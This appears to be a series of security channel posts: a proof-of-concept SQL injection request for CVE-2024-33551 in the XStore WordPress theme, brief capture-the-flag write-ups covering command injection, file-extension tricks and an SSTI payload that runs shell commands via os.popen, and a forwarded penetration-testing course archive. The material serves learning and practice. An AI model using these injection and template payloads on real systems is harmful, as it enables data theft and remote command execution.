CVE-2024-33551
Vulnerability
SQL injection discovered in 8theme XStore, an e-commerce platform built on WordPress. The vulnerability allows SQL commands to be executed in the database.
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1
#wordpress #sql
codeby.games room: Calculator
Vulnerable Type: command injection
Payload:
cat index.php
#Preparation #For #CTF
codeby.games room web: Zero order
When I opened the target given in the task, no button other than Refresh worked.
When I pressed Refresh and intercepted the request with Burp, as shown in the picture, we can see that the request is sent to the index.php file. Further down there is another parameter: ext=.order
Instead of .order you can try entering various formats. Example: .php, .js, etc.
For each format we enter, we get a different response.
Then, to use all formats at once, we use .* and, looking at the response, we find the flag.
#Preparation #For #CTF
codeby.games room web: Profiler
To solve this task, read this material: https://pkg.go.dev/net/http/pprof
#Preparation #For #CTF
codeby.games room web: Strange server
When I looked at the task, I thought /hello_world and /robots.txt must be some kind of hint, and I searched for directories via FUZZING. But there was no result. Then, to determine what kind of vulnerability was present, I started trying various payloads; I used a payload for SSTI and got a great result: {{7*7}}
This payload is used to execute the 'id' command: {{ self.init.globals.builtins.import('os').popen('id').read() }}
We need to search for the flag by using other commands in place of id in .popen('id').
#Preparation #For #CTF
Forwarded from Cat Seclist
HTB_CPTS.zip
134 MB
HTB Certified Penetration Testing Specialist (HTB CPTS)